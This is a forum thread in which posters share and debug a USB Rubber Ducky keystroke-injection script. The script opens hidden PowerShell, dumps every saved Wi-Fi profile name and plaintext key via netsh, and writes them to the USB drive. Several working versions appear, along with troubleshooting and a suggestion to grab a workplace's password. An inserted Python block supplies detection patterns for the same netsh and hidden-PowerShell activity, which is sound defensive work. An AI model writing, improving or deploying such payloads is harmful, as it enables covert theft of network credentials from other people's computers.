Help With Wifi Password Grabber


So I have been working on a script (admittedly for a while, this is my first script) to grab wifi names and passwords off computers and dump them to a text file. So far I have it working great, it grabs every wireless Internet connection that the computer has ever made and it dumps it straight back to USB within seconds, to grab and go. I just need help with one thing... How to hide the PowerShell window, and is there any way of making this script better (I already know I can use PowerShell to send txt files to servers or through email, I just think it's easier with such a simple script to dump it straight back to USB)?

Here is the Script

Quote

REM Name: Windows 10 Powershell WIFI Passwords Grabber
REM Author: Braineater, Mad Props To Darren Kitchen For Volume Finder Script
DELAY 2000
GUI R
DELAY 200
STRING powershell
ENTER
DELAY 200
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
ENTER
DELAY 100
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords.txt
ENTER
DELAY 100
STRING exit
ENTER

 

Link to comment
Share on other sites

I'll try that, thanks. But can you still interact with the window when it is hidden, i.e. HID attack?

 

Link to comment
Share on other sites

Thanks for the help. This is the final product that I have come up with and I'm super happy with it for my first script and my first go at PowerShell. I know there would be a way to shorten the PowerShell down, so if anyone comes up with anything please post it below. I also added a generated date stamp to the output txt file so you can save multiple computers' and days' worth of extracted files.

 

E.g. a mate forgets his wifi password to give to you and you want the wifi password from work: you can plug it in and save both automatically.

Quote

REM Name: Windows 10 Powershell WIFI Passwords Grabber
REM Author: Braineater
REM Mad Props: Darren Kitchen for Volume Finder
DELAY 2000
GUI R
DELAY 200
STRING powershell -WindowStyle hidden
ENTER
DELAY 200
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
ENTER
DELAY 100
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-date -f yyyy-MM-dd).txt
ENTER
DELAY 100
STRING exit
ENTER

 

Link to comment
Share on other sites
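
For defenders, the payload posted above leaves a recognisable trail in process-creation logs: one PowerShell parent (started with -WindowStyle hidden) spawning `netsh wlan show profile ... key=clear` once per saved network. The following is an added example, not part of the thread or any poster's code; the record fields (time, host, pid, ppid, cmd) and the sample events are constructed assumptions modelled on process-creation logging with command lines enabled.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# "netsh wlan show profile ... key=clear" is the call that prints a stored key in plaintext.
KEY_CLEAR = re.compile(r'\bnetsh(?:\.exe)?"?\s+wlan\s+show\s+profiles?\b.*\bkey\s*=\s*clear\b', re.I)
PROFILE = re.compile(r'\bname\s*=\s*(?:"([^"]+)"|(\S+))', re.I)
# powershell started with -WindowStyle hidden (PowerShell also accepts shortened prefixes such as -w).
HIDDEN_PS = re.compile(r'\bpowershell(?:\.exe)?"?\s.*-w[a-z]*\s+hidden\b', re.I)

def find_wifi_key_dumps(events, window=timedelta(seconds=30), min_profiles=3):
    """Alert when one parent process reads several distinct Wi-Fi keys within `window`."""
    hidden = {(e["host"], e["pid"]) for e in events if HIDDEN_PS.search(e["cmd"])}
    reads = defaultdict(list)                      # (host, parent pid) -> [(time, profile)]
    for e in events:
        if KEY_CLEAR.search(e["cmd"]):
            m = PROFILE.search(e["cmd"])
            profile = (m.group(1) or m.group(2)) if m else "*"
            reads[(e["host"], e["ppid"])].append((datetime.fromisoformat(e["time"]), profile))
    alerts = []
    for (host, ppid), hits in sorted(reads.items()):
        hits.sort()
        # The window is measured from the first key read by this parent.
        profiles = sorted({p for t, p in hits if t - hits[0][0] <= window})
        if len(profiles) >= min_profiles:
            alerts.append({"host": host, "parent_pid": ppid, "profiles": profiles,
                           "hidden_parent": (host, ppid) in hidden})
    return alerts

# Constructed process-creation records; field names are assumptions, not a real log schema.
SAMPLE = [
    {"time": "2024-05-01T09:00:00", "host": "WS01", "pid": 4120, "ppid": 900,
     "cmd": "powershell -WindowStyle hidden"},
    {"time": "2024-05-01T09:00:02", "host": "WS01", "pid": 4200, "ppid": 4120,
     "cmd": "netsh wlan show profiles"},
    {"time": "2024-05-01T09:00:03", "host": "WS01", "pid": 4201, "ppid": 4120,
     "cmd": 'netsh wlan show profile name="HomeNet" key=clear'},
    {"time": "2024-05-01T09:00:03", "host": "WS01", "pid": 4202, "ppid": 4120,
     "cmd": 'netsh wlan show profile name="Cafe Guest" key=clear'},
    {"time": "2024-05-01T09:00:04", "host": "WS01", "pid": 4203, "ppid": 4120,
     "cmd": '"C:\\Windows\\System32\\netsh.exe" wlan show profile name=Office key=clear'},
    {"time": "2024-05-01T11:30:00", "host": "WS02", "pid": 700, "ppid": 650,
     "cmd": 'netsh wlan show profile name="Office" key=clear'},   # single lookup: no alert
]

if __name__ == "__main__":
    for alert in find_wifi_key_dumps(SAMPLE):
        print(alert)
```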

Awesome, thanks for the heads up, I'll give it a go. I'm assuming that if it works on Windows 7 it's forwards and maybe backwards compatible? Not many changes have been made to PowerShell from what I can tell. I'll have to read up on Windows 7 PowerShell too. Thanks for the tip.

Link to comment
Share on other sites

  • 2 weeks later...

When I try your script I get an error with this line

$u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name

the error says

cd : Cannot process argument because the value of argument "path" is null. Change the value of argument "path" to a
non-null value.
At line:1 char:53
+ $u=gwmi Win32_Volume|?{$_.Label -eq'@'}|select name;cd $u.name
+                                                     ~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Set-Location], PSArgumentNullException
    + FullyQualifiedErrorId : ArgumentNull,Microsoft.PowerShell.Commands.SetLocationCommand

I don't know what's wrong. I'm running Win10 Pro, but the path gives me an error... Can you tell me what's wrong?

Link to comment
Share on other sites

I can certainly try @index. Can I ask the name of the USB flash drive that you used (i.e. the name you have given to the drive) or what you named the mass storage of the twin duck that you used?

This code has to be used with the rubber ducky flashed with the twin duck firmware, or the standard duck (or Arduino) with a second USB drive plugged in as well (as it needs somewhere to store the output file). The way I have written the code (stole it from Darren), the USB or duck has to be named @ (just simply the at sign "@" and nothing else). You can of course change this just by changing the @ symbol in the code.

ie

$u=gwmi Win32_Volume|?{$_.Label -eq'your drive name here'}|select name;cd $u.name

It seems from the code PowerShell is throwing after running the command that it cannot find the drive name specified.

Hopefully this helps, and if not let me know and I can look into it more (currently not in front of my computer).

Edited by BrainEater
Link to comment
Share on other sites

Ohh yeah, thanks. I'm just new with this shell syntax thing... I'm sorry.

So I fixed it but nothing was saved. When I was debugging what just happened, with some delay, I noticed something changed in the command in PowerShell.

The ducky typed this code:

$u=gwmi Win32_Volume|?{$_.Label -eq'anjing'}|select name;cd $u.name
PS D:\> (netsh wlan show profiles) | Select-String @\:(.+)$@ | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh
 wlan show profile name=@$name@ key=clear)}  | Select-String @Key Content\W+\:(.+)$@ | %{$pass=$_.Matches.Groups[1].Valu
e.Trim(); $_} | %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >WfiPasswords$(get-da
te -f yyyy-MM-dd).txt

Notice this quotation mark should be written with @, right? >  %{[PSCustomObject]"{ PROFILE_NAME=$name;PASSWORD=$pass }}

I think something is wrong when I encode your script with ducktoolkit... How can I fix this?

Link to comment
Share on other sites

OK, so I found the answer. I'm so sorry that I posted a new post, I don't know why I can't edit my post above.

I don't know if it's my laptop's error or my USB ducky's error, because it seems that my laptop reads "quotation mark" as the @ symbol and the @ symbol as "quotation mark" when my ducky writes into PowerShell... I had to replace @ with "quotation mark", and likewise replace "quotation mark" with @, and re-encode it again, then my problem was solved. Did you ever experience this kind of error?

Link to comment
Share on other sites

That's fine mate, and don't be sorry, I'm happy to help when I can. I'm only new to all this as well.

So the issue you're having is really simple and it's not your computer or the script. If you are using the duck encoder on the website duckytoolbox, it's an issue with the encoder. I have had the exact same problem when encoding anything more than a simple script. The easy fix is just to download the Java script encoder (or the whole duck toolkit) from Darren's GitHub page and encode it on your computer with that. It's up to date, and from what I believe the website is no longer maintained.

Link to comment
Share on other sites

@illwill While I'm here I will thank you for your input. It's interesting to see how PowerShell has changed over the years, but at the core it's still the same today as it was when it first came out. They have just added a few little commands to make life easier. Your adjustments work great and worked on every version of PowerShell. I'll give you some mad props in my REM and from now on try to code at the most basic level of PowerShell because it's upwards compatible.

Edited by BrainEater
Link to comment
Share on other sites

  • 4 years later...
  • 1 year later...

I always get an error when I use it. I changed the path but always get the path null error. My path is H.

 

CODE:

REM usb rubber ducky wifi password exfiltrator
REM created by : C0SM0

REM let the computer recognize the twinduck
DELAY 1000

REM open powershell via runbox
GUI r
DELAY 200
STRING powershell
ENTER
DELAY 300

REM cd into twinduck labeled "H"
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'H'}|select name;cd $u.name
ENTER
DELAY 100

REM exfiltrate wifi passwords to a file
REM file named after the computer name
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize >$env:UserName".txt"; exit
ENTER

 

Link to comment
Share on other sites
